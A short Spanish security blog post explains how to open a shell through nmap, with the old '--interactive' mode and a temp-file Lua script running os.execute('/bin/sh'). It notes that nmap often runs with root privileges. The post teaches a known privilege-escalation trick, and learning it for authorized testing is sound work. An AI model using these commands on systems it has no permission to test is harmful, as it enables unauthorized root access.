Contacto
< Recursos

> Nmap, ¿solo para realizar escaneos?

Vamos a ver un truco (o dos) para abrir una shell usando nmap.

Nmap es una aplicación utilizada no solo por pentesters o hackers, sino también por administradores de sistemas, por lo que es fácil que nos la encontremos instalada, y además con privilegios de root, pero… ¿sabes que se puede abrir una shell usando nmap?Si está instalada una versión antigua (hasta la 5.2) venía con un modo interactivo:

​#nmap –interactive
#!sh

Y esto abre una shell:

¿Y para versiones más actuales? Pues usamos nuestros conocimientos de bash, podemos crear un script como el siguiente:

​TF=$(mktemp)
echo ‘os.execute(«/bin/sh»)’ > $TF
nmap –script=$TF​

Asignarle permisos y ejecutarlo:

Y listo, ya tenemos nuestra Shell, podemos hacer uso de herramientas no destinadas para ello para acceder a ficheros y explorar el sistema operativo objetivo.

Always Learning.

Recursos gratuitos en tu email

Sigue leyendo

,

  • Hacking

Otra vuelta al Sol

Otra vuelta al Sol, si ya sé que es un tópico muy repetido, pero cuando trabajas con tecnología, la vida parece que pasa mas rápido, un nuevo descubrimiento, otro avance, un nuevo protocolo o cómo alguien publica que se puede explotar una vulnerabilidad de una manera todavía más creativa.
  • Hardening

Directivas de Seguridad en el Correo con M365

En Hack by Security sabemos que uno de los pilares de la ciberseguridad en entornos modernos es la Seguridad en el Correo, uno de los vectores de ataque más frecuentes de una organización, tanto en empresas pequeñas como grandes multinacionales están expuestas al mismo riesgo, un usuario que abra un enlace o archivo malicioso puede iniciar un incidente de seguridad con un alto impacto.
  • Formación, Hacking

BCDO Bootcamp de Ciberseguridad Defensiva y Ofensiva

El próximo 09 de Octubre en Hack By Security, comienza una nueva edición del Bootcamp de Ciberseguridad Defensiva y Ofensiva, 104 horas de sesiones online en directo, con acceso después a las clases, por si quieres repasar o volver a ver alguna parte de la sesión.
Powered by  GDPR Cookie Compliance
Resumen de privacidad

Esta web utiliza cookies para que podamos ofrecerte la mejor experiencia de usuario posible. La información de las cookies se almacena en tu navegador y realiza funciones tales como reconocerte cuando vuelves a nuestra web o ayudar a nuestro equipo a comprender qué secciones de la web encuentras más interesantes y útiles.